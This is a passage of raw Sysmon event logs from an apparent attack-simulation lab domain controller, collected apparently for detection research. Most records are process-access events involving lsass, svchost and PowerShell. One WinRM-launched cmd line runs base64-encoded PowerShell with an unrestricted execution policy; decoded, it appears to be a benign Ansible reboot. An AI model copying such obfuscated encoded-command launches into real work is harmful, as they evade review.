15:50:24.513{D28789B6-7C40-5FA1-0803-000000008701}49204300C:\Windows\system32\WinrsHost.exe{D28789B6-7C40-5FA1-0C03-000000008701}4100C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fa39|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+6114b|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+5219e|C:\Windows\System32\RPCRT4.dll+25357|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b 154100x8000000000000000482Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.526{D28789B6-7C40-5FA1-0C03-000000008701}4100C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAVQB3AEIAbABBAEgAUQBBAEwAUQBCAFQAQQBIAFEAQQBjAGcAQgBwAEEARwBNAEEAZABBAEIATgBBAEcAOABBAFoAQQBCAGwAQQBDAEEAQQBMAFEAQgBXAEEARwBVAEEAYwBnAEIAegBBAEcAawBBAGIAdwBCAHUAQQBDAEEAQQBUAEEAQgBoAEEASABRAEEAWgBRAEIAegBBAEgAUQBBAEMAZwBCAHoAQQBHAGcAQQBkAFEAQgAwAEEARwBRAEEAYgB3AEIAMwBBAEcANABBAEkAQQBBAHYAQQBIAEkAQQBJAEEAQQB2AEEASABRAEEASQBBAEEAeQBBAEMAQQBBAEwAdwBCAGoAQQBDAEEAQQBJAGcAQgBTAEEARwBVAEEAWQBnAEIAdgBBAEcAOABBAGQAQQBBAGcAQQBHAGsAQQBiAGcAQgBwAEEASABRAEEAYQBRAEIAaABBAEgAUQBBAFoAUQBCAGsAQQBDAEEAQQBZAGcAQgA1AEEAQwBBAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBpAEEAQQBvAEEAUwBRAEIAbQBBAEMAQQBBAEsAQQBBAHQAQQBHADQAQQBiAHcAQgAwAEEAQwBBAEEASgBBAEEALwBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBTAFEAQgBtAEEAQwBBAEEASwBBAEIASABBAEcAVQBBAGQAQQBBAHQAQQBGAFkAQQBZAFEAQgB5AEEARwBrAEEAWQBRAEIAaQBBAEcAdwBBAFoAUQBBAGcAQQBFAHcAQQBRAFEAQgBUAEEARgBRAEEAUgBRAEIAWQBBAEUAawBBAFYAQQBCAEQAQQBFADgAQQBSAEEAQgBGAEEAQwBBAEEATABRAEIARgBBAEgASQBBAGMAZwBCAHYAQQBIAEkAQQBRAFEAQgBqAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEkAQQBCAFQAQQBHAGsAQQBiAEEAQgBsAEEARwA0AEEAZABBAEIAcwBBAEgAawBBAFEAdwBCAHYAQQBHADQAQQBkAEEAQgBwAEEARwA0AEEAZABRAEIAbABBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBaAFEAQgA0AEEARwBrAEEAZABBAEEAZwBBAEMAUQBBAFQAQQBCAEIAQQBGAE0AQQBWAEEAQgBGAEEARgBnAEEAUwBRAEIAVQBBAEUATQBBAFQAdwBCAEUAQQBFAFUAQQBJAEEAQgA5AEEAQwBBAEEAUgBRAEIAcwBBAEgATQBBAFoAUQBBAGcAQQBIAHMAQQBJAEEAQgBsAEEASABnAEEAYQBRAEIAMABBAEMAQQBBAE0AUQBBAGcAQQBIADAAQQBJAEEAQgA5AEEAQQA9AD0AC:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7C40-5FA1-CF12-110000000000}0x1112cf0HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7C40-5FA1-0803-000000008701}4920C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x8000000000000000481Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.513{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000480Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.513{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000479Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.513{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000478Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.513{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000477Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.513{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000476Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.513{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000475Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.325{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7C40-5FA1-0B03-000000008701}1544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000474Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.310{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7C40-5FA1-0B03-000000008701}1544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000473Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.278{D28789B6-7C40-5FA1-0B03-000000008701}1544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_nzezz3fw.nrg.ps12020-11-03 15:50:24.278 10341000x8000000000000000472Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.263{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C40-5FA1-0B03-000000008701}1544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000471Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.232{D28789B6-7C40-5FA1-0903-000000008701}32084428C:\Windows\system32\conhost.exe{D28789B6-7C40-5FA1-0B03-000000008701}1544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000470Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.232{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000469Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.232{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000468Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.232{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000467Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.232{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000466Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.232{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000465Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.232{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000464Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.232{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000463Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.232{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000462Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.232{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000461Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 